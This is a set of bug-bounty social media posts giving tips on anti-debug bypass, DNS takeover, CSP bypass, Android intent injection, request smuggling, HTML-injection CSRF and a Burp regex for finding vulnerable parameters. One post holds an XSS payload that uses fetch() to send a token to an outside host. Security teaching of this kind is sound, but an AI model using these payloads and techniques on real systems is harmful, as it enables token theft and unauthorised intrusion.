🔬 FRIDA for Bypassing Anti-Debug
🐍 This tutorial shows you how to use Dynamic Binary Instrumentation (DBI) and the Interceptor.attach method to defeat common anti-debugging features in Windows binaries.
👉 https://t.co/4zvrmLkPXB
Under project "The Sword" I present:
🛠️ etxNuclei Template Generator
Submit CVE + POC → AI generates YAML → validated → uploaded to Slack
Converts exploits to scan templates in seconds. No manual YAML writing.
https://t.co/FkrFlyNCD1
#bugbounty #n8n
A DNS takeover is not the same as a subdomain takeover.
DNS takeovers have become a popular but often misunderstood vulnerability.
In this blog, you will learn:
✅ The difference between a DNS and subdomain takeover: A subdomain takeover exploits a service a domain points to, while a DNS takeover gives the attacker full control over the DNS server itself, which is more severe.
✅ How to spot a vulnerable domain: Learn the two key criteria for detecting a DNS takeover, including looking for a SERVFAIL or REFUSED status and identifying a domain's authoritative nameservers.
✅ How to take control of a domain: The blog walks you through the process, from finding vulnerable DNS providers to the steps needed to claim a domain.
✅ Automated Detection: Discover how to use tools like Nuclei with specific templates to automate the detection of domains that are potentially vulnerable to a DNS takeover.
Want to master DNS takeovers and learn how to defend against them?
Read the full article for a complete guide.👇
https://t.co/t68sgAyiaU
Solution: javascript://httpbin.org/%0afetch('https://x.com/#');
When the query is added to the URL, it will look like: javascript://httpbin.org/%0afetch('https://x.com?token=SEC#');
The trick is using the fragment (#) to ensure the function call is closed.
Found an XSS but got blocked by the CSP?
https://t.co/0aA3GyIOVz has a compiled list of ways to bypass the Content-Security Policy. Check out the video below 👇
If you see android:exported="true" in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method; this may give you SSRF, exfiltration of sensitive data, or RCE. 🥰🌹🥳
#BugBounty #bugbountytips
Sometimes people think they've found HTTP request smuggling, when they're actually just observing HTTP keep-alive or pipelining. This is usually a false positive, but sometimes there's actually a real issue there! Learn how to tell the two apart:
https://t.co/K8BqcVxu5A
HTML Injection That Paid $3K
Main issue: most websites only rely on SameSite cookies for CSRF protection.
No XSS? No problem.
HTML Injection + <form> can still trigger sensitive actions.
Hope this helps!
Honorable mention to my bug bounty partner @fariqfgi 🙌
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:
Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
And find potentially vulnerable SSRF params
- https://t.co/6cfBPVn0FM
#SSRF #cybersec
I received a lot of DMs, Mentions and Comments as to why I left Bug-Bounty, where did I vanish, when would I continue with my 100k challenge and so on.
So here is the answer.
I have joined @Meta — London, UK as a Product Security Engineer which I still can't believe just happened.
I was extremely busy with the interview preparation, the interview itself and Visa Requirements afterwards for this huge change in my life.
I am extremely grateful for this opportunity and ready for the challenges ahead. Here’s to new beginnings!
Regarding bug-bounty, I will soon resume the 100k challenge, but this time with more energy, power, focus, determination and hard work.
#Meta #SecurityEngineer #DreamJob